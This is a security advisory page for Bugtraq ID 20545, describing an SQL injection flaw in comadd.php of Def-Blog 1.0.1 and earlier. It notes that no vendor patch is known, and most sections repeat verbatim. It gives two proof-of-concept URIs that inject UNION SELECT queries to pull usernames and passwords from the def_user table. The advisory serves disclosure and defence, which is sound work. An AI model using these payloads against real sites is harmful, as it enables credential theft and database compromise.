Def-Blog Comadd.PHP SQL Injection Vulnerability
BID:20545
Info
Def-Blog Comadd.PHP SQL Injection Vulnerability
| Bugtraq ID: | 20545 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 16 2006 12:00AM |
| Updated: | Oct 16 2006 09:04PM |
| Credit: | SHiKaA is credited with the discovery of this vulnerability. |
| Vulnerable: |
Def-Blog Def-Blog 1.0.1 |
| Not Vulnerable: | |
Discussion
Def-Blog Comadd.PHP SQL Injection Vulnerability
Def-BLog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 1.0.1 and earlier.
Def-BLog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 1.0.1 and earlier.
Exploit / POC
Def-Blog Comadd.PHP SQL Injection Vulnerability
Attackers can exploit these issues via a web client.
The following proofs-of-concept URIs are available:
http://www.example.com/comadd.php?article=-1%20union%20select%20null,pseudo%20from%20def_user
http://www.example.com/comadd.php?article=-1%20union%20select%20null,mdp%20from%20def_user
Attackers can exploit these issues via a web client.
The following proofs-of-concept URIs are available:
http://www.example.com/comadd.php?article=-1%20union%20select%20null,pseudo%20from%20def_user
http://www.example.com/comadd.php?article=-1%20union%20select%20null,mdp%20from%20def_user
Solution / Fix
Def-Blog Comadd.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].